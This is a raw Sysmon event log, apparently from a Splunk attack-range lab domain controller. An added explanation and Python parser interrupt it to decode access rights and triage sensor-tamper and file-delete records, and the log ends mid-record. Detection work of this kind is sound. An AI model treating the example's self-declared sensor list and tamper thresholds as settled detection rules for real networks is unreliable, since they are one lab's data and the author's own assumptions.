Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 
10341000x800000000000000098841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000098839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000098837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.235{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.999{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E627963FF2D3A8E27D410D93B3DC50,SHA256=7F7F087930259F6D5A2D7B066CE98EF8BDB5CD8B6781160ED8A81450DB94043C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.437{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15F823AD3AB7C3005A132A1CD698598,SHA256=51E7AE881035E311DFBA0DA7FDE88552A010D69383F77626CAEBDEA5416B39A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.218{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.202{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.202{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 
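The records above are Sysmon events (Image Loaded = 7, Process Access = 10, Process Create = 1, File Delete = 23) whose XML was flattened into one run-together string per event: the System fields (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) followed directly by the EventData fields (RuleName, UtcTime, ...) with no delimiters. Three things in them are worth a practitioner's attention. The Process Access records from svchost.exe into sysmon64.exe carry GrantedAccess 0x1400, which is PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION, and a call trace through lsm.dll and RPCRT4.dll, so they are session-manager queries, not sensor tampering; a handle to the sensor that includes VM_WRITE, CREATE_THREAD or SUSPEND_RESUME would be the thing to alert on. The conhost.exe and csrss.exe records with 0x1fffff (PROCESS_ALL_ACCESS) are the console host and subsystem opening a console client they serve. The File Delete records end in "false - insufficient disk space": IsExecutable is false and the Archived field reports that Sysmon could not keep a copy of the deleted file, so the hashes in the record are the only evidence that survives, and the all-zero IMPHASH there (and on ntdll.dll and win32u.dll in the Image Loaded records) simply means there was no import table to hash, not a damaged image.

The following Python is an added example, not code from the page, Sysmon or Splunk. It parses the flattened format back into fields, decodes the access mask, and runs a small triage over three records copied from the dump above (one svchost.exe to sysmon64.exe access, one conhost.exe access, one failed-archive File Delete). The header is splittable only because Sysmon's Task value repeats the EventID, Keywords is a fixed 16-hex-digit value and RuleName is "-"; SourceProcessId and SourceThreadId of an event 10 are run together with no way to separate them, so the parser keeps them as one digit run. The regexes, the SENSORS list, TAMPER_RIGHTS and the severity labels are this example's own assumptions.

```python
import re

# Added example (not code from the page, Sysmon or Splunk): parse Sysmon events
# flattened into one run-together string each and triage events 10 and 23.
# The regexes, SENSORS, TAMPER_RIGHTS and severities are assumptions of this example.

CHANNEL = "Microsoft-Windows-Sysmon/Operational"

# System block: EventID Version Level Task Opcode Keywords RecordID Channel Computer,
# then EventData: RuleName ("-" when no rule matched) and UtcTime. Task repeats the
# EventID and Keywords is always 16 hex digits, which is what makes the leading digit
# run splittable without delimiters.
HEADER_RE = re.compile(
    r"^(?P<event_id>\d+)(?P<version>\d)(?P<level>\d)(?P=event_id)(?P<opcode>\d)"
    r"(?P<keywords>0x[0-9A-Fa-f]{16})(?P<record_id>\d+)" + re.escape(CHANNEL)
    + r"(?P<computer>.+?)-(?P<utc_time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})"
    r"(?P<body>.*)$"
)
# Event 10 body: SourceProcessGUID, SourceProcessId+SourceThreadId (run together,
# unsplittable here), SourceImage, TargetProcessGUID, TargetProcessId, TargetImage,
# GrantedAccess, CallTrace.
ACCESS_RE = re.compile(
    r"^\{(?P<src_guid>[0-9A-F-]+)\}(?P<src_pid_tid>\d+)(?P<src_image>[A-Za-z]:\\.*?)"
    r"\{(?P<tgt_guid>[0-9A-F-]+)\}(?P<tgt_pid>\d+)(?P<tgt_image>[A-Za-z]:\\.*?)"
    r"(?P<granted>0x[0-9A-Fa-f]+)(?P<call_trace>[A-Za-z]:\\.*)$"
)
# Event 23 body: ProcessGuid, ProcessId, User, Image, TargetFilename, Hashes
# (MD5,SHA256,IMPHASH order as in the dump), IsExecutable, Archived.
DELETE_RE = re.compile(
    r"^\{(?P<guid>[0-9A-F-]+)\}(?P<pid>\d+)(?P<user>.+?)(?P<image>[A-Za-z]:\\.*?)"
    r"(?P<target>[A-Za-z]:\\.*?)(?P<hashes>MD5=[0-9A-F]+,SHA256=[0-9A-F]+,IMPHASH=[0-9A-F]+)"
    r"(?P<is_executable>true|false)(?P<archived>.*)$"
)
# PROCESS_* rights from winnt.h plus the standard rights in the high bits.
PROCESS_RIGHTS = {
    0x1: "TERMINATE", 0x2: "CREATE_THREAD", 0x4: "SET_SESSIONID", 0x8: "VM_OPERATION",
    0x10: "VM_READ", 0x20: "VM_WRITE", 0x40: "DUP_HANDLE", 0x80: "CREATE_PROCESS",
    0x100: "SET_QUOTA", 0x200: "SET_INFORMATION", 0x400: "QUERY_INFORMATION",
    0x800: "SUSPEND_RESUME", 0x1000: "QUERY_LIMITED_INFORMATION",
    0x2000: "SET_LIMITED_INFORMATION", 0x10000: "DELETE", 0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
# Rights that let the opener change the target: inject, patch memory, suspend, re-ACL.
TAMPER_RIGHTS = 0x2 | 0x8 | 0x20 | 0x80 | 0x800 | 0x40000 | 0x80000
# Telemetry processes whose handles deserve a look (assumed list for this example).
SENSORS = {"sysmon.exe", "sysmon64.exe", "splunkd.exe", "splunk-winevtlog.exe"}

# Constructed sample input: three records copied from the flattened dump above.
SAMPLE_EVENTS = [
    r"10341000x800000000000000098841Microsoft-Windows-Sysmon/Operational"
    r"win-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234"
    r"{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe"
    r"{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|"
    r"c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|"
    r"C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|"
    r"C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|"
    r"C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|"
    r"C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|"
    r"C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|"
    r"C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|"
    r"C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791",
    r"10341000x800000000000000098846Microsoft-Windows-Sysmon/Operational"
    r"win-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234"
    r"{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe"
    r"{326FD73D-C0B7-6294-340B-000000005502}6608"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffff"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|"
    r"C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|"
    r"C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791",
    r"23542300x800000000000000098834Microsoft-Windows-Sysmon/Operational"
    r"win-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.999"
    r"{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEM"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"
    r"C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational"
    r"MD5=C8E627963FF2D3A8E27D410D93B3DC50,"
    r"SHA256=7F7F087930259F6D5A2D7B066CE98EF8BDB5CD8B6781160ED8A81450DB94043C,"
    r"IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
]


def decode_access(mask: int) -> list:
    """Name the PROCESS_* bits in a GrantedAccess mask; unknown bits stay as hex."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)  # keys are distinct powers of two
    if leftover:
        names.append(f"0x{leftover:x}")
    return names


def parse_event(raw: str) -> dict:
    """Split one flattened record into its System fields and, for 10/23, its EventData."""
    m = HEADER_RE.match(raw.strip())
    if not m:
        raise ValueError("not a flattened Sysmon record: " + raw[:40])
    ev = m.groupdict()
    ev["event_id"] = int(ev["event_id"])
    ev["record_id"] = int(ev["record_id"])
    body = ev.pop("body")
    detail = {10: ACCESS_RE, 23: DELETE_RE}.get(ev["event_id"])
    dm = detail.match(body) if detail else None
    if dm:
        ev.update(dm.groupdict())
    if "granted" in ev:
        ev["granted"] = int(ev["granted"], 16)
    return ev


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(raw_events) -> list:
    """Return (record_id, severity, message) for records worth an analyst's time."""
    findings = []
    for raw in raw_events:
        ev = parse_event(raw)
        rid = ev["record_id"]
        if ev["event_id"] == 10 and "granted" in ev:
            src, tgt = image_name(ev["src_image"]), image_name(ev["tgt_image"])
            if src == "conhost.exe":
                continue  # console host opening its client with full access: expected noise
            rights = "|".join(decode_access(ev["granted"]))
            if tgt in SENSORS and ev["granted"] & TAMPER_RIGHTS:
                findings.append((rid, "high", f"{src} opened sensor {tgt} with {rights}"))
            elif tgt in SENSORS:
                findings.append((rid, "info", f"{src} query-only handle to {tgt}: {rights}"))
        elif ev["event_id"] == 23 and "archived" in ev:
            if ev["archived"] != "true":
                name = image_name(ev["image"])
                findings.append((rid, "warn", f"{name} deleted a file Sysmon could not archive ({ev['archived']}); hashes are the only surviving evidence"))
    return findings


if __name__ == "__main__":
    for record_id, severity, msg in triage(SAMPLE_EVENTS):
        print(f"[{severity}] record {record_id}: {msg}")
```

Run as a script it reports the svchost.exe handle to sysmon64.exe as query-only (QUERY_INFORMATION|QUERY_LIMITED_INFORMATION) and the File Delete as an archive failure, and stays silent on the conhost.exe record. The backreference in HEADER_RE is the only reason the digit run "10341000x8..." resolves to EventID 10, Version 3, Level 4, Task 10, Opcode 0 rather than some other split, so the parser is tied to Sysmon's Task-equals-EventID convention; if a dump ever carried a non-Sysmon provider the header would not match and parse_event raises instead of guessing.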
734700x800000000000000098930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 